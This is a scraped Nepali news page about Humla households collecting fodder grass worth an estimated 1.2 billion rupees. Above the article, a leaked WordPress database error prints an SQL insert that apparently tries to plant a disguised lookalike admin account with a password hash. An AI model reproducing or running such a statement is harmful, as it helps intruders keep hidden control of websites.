WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BhMCgSWEVSpIIjBc2SHvDt8Vgiazlv0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 06:40:12', '', 'admlnlx', 'admlnlx')

हुम्लामा एक अर्बको घाँस, बन्दैछ जीउने आस – Gaule Khabar

हुम्लामा एक अर्बको घाँस, बन्दैछ जीउने आस

हुम्लामा एक अर्बको घाँस, बन्दैछ जीउने आस

कर्ण बहादुर रोकाया, हुम्ला ।। हुम्ला जिल्लाका नौ हजार घरधुरीले यो वर्षको हिउँदमा पशुवस्तहरुका लागि करीब ६ करोड पुला घाँस संकलन गरेका छन् । यो हिसाबले एक पुला घाँसको न्युनतम रकम २० रुपैँयाका हिसाबले लेखाजोखा गर्दा यो वर्ष हुम्ला जिल्लाभरी एक अर्ब २० करोडको घाँस संंंकलन भएको छ ।         

कुनै बेला तिरन बेच्ने र हिरन किन्ने उभो लाग्दैन भन्ने उखान चलेको हुम्लामा अहिले गाउँघर वरपर त्यसै खेर जाने घाँस संकलन पनि राम्रो आम्दानीको स्रोत बन्दै गएको कुरा सिमकोट ३ का मनवीरे रोकायाले अनुभव रहेको छ । उनी घाँस संकलन गरेर प्रत्येक वर्ष १० हजार जति कमाउने गर्छन् । यस्तै प्रकार हुम्लाको सदरमुकाम सिमकोट वरपर घाँस संकलन गरी बेच्ने काम राम्रो आम्दानीको स्रोत बन्ने गरेको छ । सदरमुकाम वरपरका करीब दुई दर्जन गाउँहरुबाट वर्षेनी लाखौं रकम घाँस संकलन गरी गदा, खच्चर र अन्यहरुलाई बेचेर कमाई हुने गरेको छ । हाल हुम्ला जिल्लामा तीन हजार खच्चरहरु रहेका छन् । हुम्लाको सिमकोटमा प्रति पुलाका ५० रुपैयाँमा बिक्री हुन्छ भने गाउँहरुमा १० देखि ३० रुपैयाँसम्म बेच्ने गरिएको जिल्ला पशु सेवा कार्यालय स्रोतबाट जानकारी प्राप्त भएको छ ।    

जिल्ला पशु सेवा कार्यालयको आँकडा अनुसार हुम्लामा एक लाख ५२ हजारभन्दा धेरै पशुवस्तुहरु रहेका छन् । जबकि हुम्लीहरु दुई सयभन्दा बस्तीहरुमा वर्षा र हिउँदको समयभमा बस्ने गर्दै आएका छन् । जिल्लाको अधिंकास भागहरुमा हिउँदको ६ महिनामा दिउँसो वनमा चराउने चलन भए पनि बेलुका केही मात्रामा घरमा घाँस हाल्ने पर्ने भएकाले धेरै मात्रामा घाँस, कुनाउडो, नल, घुरेन र स्याउलाहरु जम्मा गनुपर्छ ।

पशुपालन हुम्ला जिल्लाको एक प्रमुख पेशा भएकोले हुनाले आधारभूत आवश्यकताका धेरै कुराहरु पशुपालनबाट परिपुर्ति हुने भए पनि पशुपालनलाई हुम्लामा अझै परम्परागत पेशाका रुपमा मात्र लिने गरिन्छ । जिल्लामा बहुदलसँगै यहाँको मेरुदण्डको रुपमा भएको सीप र गोट क्याराभान अर्थात् भेडाबाख्रा  पालनमा आएको रीक्तता केही मात्रामा खच्चर र गदा पालनले लिने प्रयास गरे पनि यो सम्भब हुन सकेको छैन । पशुपालनबाट एकातिर खाद्यान्न आपस्र्तिदेखि आय आर्जनको माध्यमसम्म लिने गरिरुन्छ भने अर्कातिर कृषिका लागि नभई नहुने मल पनि यही पेशाबाट लिने गरिएकोले यो वर्ष मात्र जिल्लाभरीका नौ हजार घरधुरीले छ करोड पुला घाँस संंकलन गरेका छन् । यसबाट करीब एक अर्ब २० करोड बराबरको घाँस मात्र पशुवस्तुहरुका लागि खर्च भएको छ । विभिन्न प्रकारका रोगव्याधीहरु, घाँसपात, स्याउला, सोतर, कुँडो, दाना, जनशक्तिको हिसाव गर्दा पनि हुम्लामा नयाँ शैली तथा प्रविधिकमा घाँसखेती गर्न सकेमा आम्दानीको नयाँ आयाम हुने छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका